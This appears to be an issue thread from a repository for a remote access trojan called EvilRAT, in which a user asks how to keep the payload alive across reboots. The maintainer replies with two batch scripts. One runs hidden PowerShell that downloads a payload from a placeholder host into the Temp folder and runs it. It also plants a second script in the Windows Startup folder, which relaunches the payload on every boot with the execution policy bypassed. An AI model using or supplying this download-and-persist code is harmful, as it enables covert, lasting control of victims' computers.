### ISSUE TITLE
Persistence for payload

### ISSUE THREAD

**Issue by nomad231** [pr0xy-8L4d3/EvilRAT#3]
Hi,

Is there anyway to make persist the payload? For first execute i can access to payload but when restart pc or close session, i cant connect again. How can i persist it?

In meterpreter i can use persistence.py module with autoscript parameter for automatic execute it, but in this payload i cant use it.

Thanks.

**Comment by pr0xy-8L4d3** [comment]
Hi,

sorry for late respond. It would be possible with some modifications. But for example you can try to make persistent on the following way. The payload file should be stored somewhere on local disc. And then, it should be executed every time pc turn on, over e.g. persistent script stored in startup programs folder. IT should looks something like this:

main.bat file:
@ECHO OFF
cd %userprofile%\AppData\Local\Temp
start PowerShell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('IP file located/payload.bat','payload.bat');Start-Process 'payload.bat' 
cd "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
start PowerShell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('IP file located/persistence.bat', 'persistence.bat')

persistence.bat file:
@ECHO OFF
cd %userprofile%\AppData\Local\Temp
start PowerShell -windowstyle hidden -ExecutionPolicy Bypass Start-Process 'payload.bat'

while payload.bat is generaed with EvilRat.

So, as you can see main.bat downloads payload in %userprofile%\AppData\Local\Temp folder and execute it. It also download persistence.bat in %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup folder. In this folder all files will run at start up pc. And as you can see persistence.bat will run payload which we previously downloaded and stored.

Please take into account that I did not have time to test above written, but I am sure it should work.

**Comment by nomad231** [comment]
Hi,

Thanks for respond. I will try it.

Farewell.
